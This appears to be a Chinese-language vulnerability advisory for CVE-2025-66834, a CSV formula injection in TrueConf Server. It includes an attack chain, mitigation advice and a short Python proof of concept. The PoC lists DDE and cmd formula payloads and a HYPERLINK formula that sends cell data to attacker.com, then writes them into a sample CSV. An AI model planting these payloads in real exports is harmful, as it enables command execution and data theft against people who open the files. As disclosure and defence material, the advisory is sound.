CVE-2025-66834 TrueConf Server CSV公式注入漏洞

漏洞信息

漏洞编号

CVE-2025-66834

漏洞类型

CSV Formula Injection

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

TrueConf Server

漏洞概述

CVE-2025-66834是TrueConf Server v5.5.2.10813版本中的一个CSV公式注入（CSV Formula Injection）漏洞。TrueConf是一款广泛使用的企业视频会议和协作平台。该漏洞允许普通用户通过在显示名称（Display Name）中注入恶意电子表格公式，当导出的聊天记录以CSV格式保存并被受害者用Microsoft Excel或其他电子表格软件打开时，注入的公式将被执行。攻击者可利用此漏洞窃取敏感信息、执行任意命令或在受害者系统上执行恶意操作。由于该漏洞需要用户交互（受害者需打开导出的CSV文件），且攻击者需要拥有平台账户（低权限即可），因此属于社会工程学与系统安全结合的高危漏洞。此漏洞影响使用TrueConf Server进行企业通信和协作的组织，可能导致机密信息泄露和内部系统被攻击者控制。

技术细节

CSV公式注入漏洞，又称CSV注入或Excel公式注入，是一种将恶意公式嵌入CSV文件的安全漏洞。在TrueConf Server中，当用户导出聊天记录时，系统会将用户名（Display Name）包含在导出的CSV文件中。如果攻击者在Display Name中嵌入电子表格公式，如=cmd|'/C calc'!A0、=HYPERLINK()或=DDE()等，当受害者使用Microsoft Excel、Google Sheets或其他电子表格软件打开该CSV文件时，这些公式将被自动解析和执行。攻击者可以利用HYPERLINK函数诱导用户访问恶意URL，利用DDE功能执行系统命令，或利用IMPORTHTML等函数进行数据外泄。CVSS 3.1评分7.3（高危）反映了该漏洞通过网络可利用、需要低权限认证、但需要用户交互的特点，机密性和完整性影响均为高。攻击者无需高级权限即可发动攻击，只需在Display Name中注入特定格式的公式字符串即可。

攻击链分析

STEP 1

步骤1

攻击者在TrueConf Server上注册账户或使用已有账户

STEP 2

步骤2

攻击者修改个人资料中的Display Name，注入恶意CSV公式（如=cmd|'/C calc'!A0）

STEP 3

步骤3

攻击者参与聊天或在群组中发送消息，使其显示名称被记录到聊天历史中

STEP 4

步骤4

管理员或有权限用户导出聊天记录为CSV格式文件

STEP 5

步骤5

受害者在本地使用Microsoft Excel或其他电子表格软件打开该CSV文件

STEP 6

步骤6

电子表格软件自动解析并执行CSV中嵌入的公式，导致命令执行或数据外泄

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-66834 PoC - TrueConf Server CSV Formula Injection
# Author: Security Researcher
# Date: 2025-12-30

# Step 1: Set malicious Display Name in TrueConf profile
# The attacker sets their display name to include formula injection payload

MALICIOUS_DISPLAY_NAME = "=cmd|'/C calc'!A0"  # Spawns calculator (for testing)
MALICIOUS_DISPLAY_NAME = "=HYPERLINK(\"http://attacker.com/steal?data=\"&A1,\"Click Here\")"  # Data exfiltration
MALICIOUS_DISPLAY_NAME = "=DDE(\"cmd\";\"/C calc\";\"A1\")"  # DDE execution
MALICIOUS_DISPLAY_NAME = "=IMPORTHTML(\"http://attacker.com/mal.html\",\"table\",0)"  # HTML import

# Step 2: Export chat logs to CSV
# When admin exports chat logs, the malicious display name is included in CSV

# Example of exported CSV content:
# "Timestamp","User","Message"
# "2025-12-30 10:00:00","=cmd|'/C calc'!A0","Hello"

# Step 3: Victim opens CSV file
# When victim opens the CSV in Excel, the formula executes

# Example PoC - Generate malicious CSV:
csv_content = '''"Timestamp","User","Message"
"2025-12-30 10:00:00","=cmd|'/C calc'!A0","Test message"
"2025-12-30 10:01:00","=HYPERLINK(\"http://attacker.com/steal?data=\"&A1,\"View\")","Another message"'''

with open('exported_chat_logs.csv', 'w') as f:
    f.write(csv_content)

print('[+] Malicious CSV file created: exported_chat_logs.csv')
print('[+] When opened in Excel, the formulas will execute')

影响范围

TrueConf Server v5.5.2.10813

防御指南

临时缓解措施

在官方修复发布前，可采取以下临时缓解措施：1) 禁用聊天记录导出功能或限制导出权限；2) 对所有导出的CSV文件进行人工审核后再分发给用户；3) 提醒用户在打开CSV文件时使用纯文本编辑器而非电子表格软件；4) 在电子表格软件中禁用自动公式执行功能（如Excel中的'手动计算'模式）；5) 监控和审计TrueConf Server上的用户资料修改行为；6) 对使用电子表格软件打开CSV文件的行为进行安全培训，提高用户安全意识。